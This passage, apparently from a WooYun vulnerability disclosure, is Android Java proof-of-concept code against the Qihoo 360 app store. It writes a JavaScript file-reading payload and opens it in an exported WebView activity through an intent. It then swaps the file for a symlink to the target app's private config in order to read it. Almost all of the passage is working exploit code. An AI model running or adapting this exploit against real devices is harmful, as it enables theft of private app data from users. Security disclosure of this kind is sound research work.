WooYun.org

String sensitive_file_name = "/data/data/com.qihoo.appstore/shared_prefs/common_config.xml";		
		DP_WebViewReadAnyFilePoC(sensitive_file_name);
	}
	@Override
	public boolean onCreateOptionsMenu(Menu menu) {
		// Inflate the menu; this adds items to the action bar if it is present.
		getMenuInflater().inflate(R.menu.main, menu);
		return true;
	}
	
	public void DP_WebViewReadAnyFilePoC(String targetfile){
		try{
			
			String shell_poc   = "/data/data/"+getApplicationContext().getPackageName()+"/files/shellpoc.html";
			
			write_payload_file();
			cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});
			
			
			String pkgName      = "com.qihoo.appstore";
			String activityName = "com.qihoo.lightapp.WebAppFakeBrowserLightActivity";
			String url          = "file://"+shell_poc;
	
			Intent intent = new Intent();
			intent.setAction("com.qihoo.light.action.WEBAPP_LINK");
			intent.setComponent(new ComponentName(pkgName, activityName));
			intent.setData(Uri.parse(url));
			startActivity(intent);
			Thread.sleep(2000);
			
			cmdexec(new String[] {"/system/bin/rm", shell_poc});
			cmdexec(new String[] {"/system/bin/ln", "-s", targetfile, shell_poc});
			cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});
			
			Thread.sleep(5000);
			
			cmdexec(new String[] {"/system/bin/rm", shell_poc});			
		}catch(Exception e){
			debugInfo(e.getMessage());
		}
	}
	@SuppressWarnings("deprecation")
	public void write_payload_file(){
		String payloadStr = "function getContent(){   \n" +
"  var url = location.href;                           \n" +
"  var xmlhttp;                                       \n" +
"  if(window.XMLHttpRequest){                         \n" +
"	xmlhttp=new XMLHttpRequest();                     \n" +
"  }else{                                             \n" +
"	xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\"); \n" +
"  }                                                  \n" +
"                                                     \n" + 
"  xmlhttp.onreadystatechange=function()              \n" +
"  {                                                  \n" +
"	if (xmlhttp.readyState==4)                        \n" +
"	{                                                 \n" +
"	  alert(xmlhttp.responseText);                    \n" + 
"	}                                                 \n" +
"  }                                                  \n" +
"  xmlhttp.open(\"GET\",url,true);                    \n" +
"  xmlhttp.send();                                    \n" +
"}                                                    \n" +
"                                                     \n" + 
"setTimeout(getContent,4000);                         \n";
		String htmlStr = "<html>                                             \n" + 
                "<head><title>Steal Sensitive Information PoC</title></head> \n" + 
	            "<body>                                                      \n" +
                "  <script type=\"text/javascript\">                         \n" + 
                      payloadStr                                                 +
	            "  </script>                                                 \n" +
	            "</body>                                                     \n" +
	            "</html>";
		try{
			FileOutputStream fOut = openFileOutput("shellpoc.html", Context.MODE_WORLD_READABLE);
			fOut.write(htmlStr.getBytes());
			fOut.close();
		}catch(Exception e){
			debugInfo(e.getMessage());
		}		
	}
	
	public void cmdexec(String[] cmd){
		try{
			Runtime.getRuntime().exec(cmd);
		}catch(Exception e){
			debugInfo(e.getMessage());
		}				
	}